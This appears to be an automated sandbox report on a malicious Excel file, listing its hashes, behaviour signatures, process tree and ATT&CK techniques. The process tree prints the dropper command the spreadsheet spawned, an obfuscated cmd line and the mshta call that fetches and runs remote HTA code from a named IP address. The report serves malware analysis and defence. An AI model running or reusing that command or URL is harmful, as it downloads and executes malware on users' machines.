Analysis

  • max time kernel
    61s
  • max time network
    56s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 00:44

General

  • Target

    2022-1-28-acfe7d6340b879f65260e326e9363cae.xls

  • Size

    46KB

  • MD5

    acfe7d6340b879f65260e326e9363cae

  • SHA1

    7ede3c78229a8b40f993a8130dea7eaa623a42ce

  • SHA256

    711cce17f03661006598a1c6888aece3145f54a9d47cdd7780644d0ea7e34608

  • SHA512

    7c9b108e4abb276f19df16f629ff847cf7bfeb6812bacb87f789260dedbac81c9e4ac414ae088511a3c063154b16ebab7f928e8b37720815f076bb94263354d3

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/vvv/ppp/fe.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\2022-1-28-acfe7d6340b879f65260e326e9363cae.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4048
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3532
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/vvv/ppp/fe.html
        3⤵
        • Blocklisted process makes network request
        PID:964
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 964 -s 1636
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2164

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4048-115-0x00007FFB38F60000-0x00007FFB38F70000-memory.dmp
    Filesize

    64KB

  • memory/4048-116-0x00007FFB38F60000-0x00007FFB38F70000-memory.dmp
    Filesize

    64KB

  • memory/4048-117-0x00007FFB38F60000-0x00007FFB38F70000-memory.dmp
    Filesize

    64KB

  • memory/4048-118-0x00007FFB38F60000-0x00007FFB38F70000-memory.dmp
    Filesize

    64KB

  • memory/4048-119-0x00007FFB38F60000-0x00007FFB38F70000-memory.dmp
    Filesize

    64KB

  • memory/4048-128-0x00007FFB36410000-0x00007FFB36420000-memory.dmp
    Filesize

    64KB

  • memory/4048-129-0x00007FFB36410000-0x00007FFB36420000-memory.dmp
    Filesize

    64KB